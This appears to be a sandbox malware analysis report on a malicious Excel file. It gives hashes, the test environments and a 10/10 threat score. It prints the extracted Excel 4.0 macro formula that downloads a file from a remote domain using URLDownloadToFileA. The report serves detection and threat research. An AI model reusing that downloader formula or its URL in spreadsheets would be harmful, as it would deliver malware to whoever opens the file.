General
Target: this_issue (74).zip
Size: 11KB
Sample: 210305-z4hdat5hzs
MD5: bb7b00cde705ee43343e0a0e05182ca3
SHA1: 74350d46d4f32913e085de4e797099c6ba7ea5de
SHA256: 4d06324eecb613b38d794f04d701378645a28f9e87b1056b95339323c150d93c
SHA512: 77e70f0bd3157b7dd5668b3c854a5a9a91dd3c94f1ffd5fda60a01da68de6ac0bfc40c4c936b165cdcc86035f8fdecfb1f292a70e11029b6f46238cd6d6cf37c
Behavioral task: behavioral1
Sample: document-630335192.xls
Resource: win7v20201028
Behavioral task: behavioral2
Sample: document-630335192.xls
Resource: win10v20201028
Malware Config
Extracted: http://dzw10jpcgj03fckc.com/inda.xls
formulas: =CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://dzw10jpcgj03fckc.com/inda.xls","..\fkruf.djr",0)
Extracted: http://dzw10jpcgj03fckc.com/inda.xls
Targets
Target: document-630335192.xls
Size: 39KB
MD5: 7f32e36c3a4ab9b3c2cb70cdd7232a97
SHA1: 19a8b5279606ef888421ed4482f4222a184b6313
SHA256: 64d8b1c5f101aca6c0f3e6b31e12bc2acef52ae9ab490b07ed5e228ed43aefd0
SHA512: 98ee0d78a0ed8ba81a5b9bce1a4745d99d9351ddc3eee6be76f5f3386cffe07bbb30a6e65a1e7cad6b5fdc47af21fd7a88fe4bbcae0e7c0667cfd3d65f63f002
Score: 10/10
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.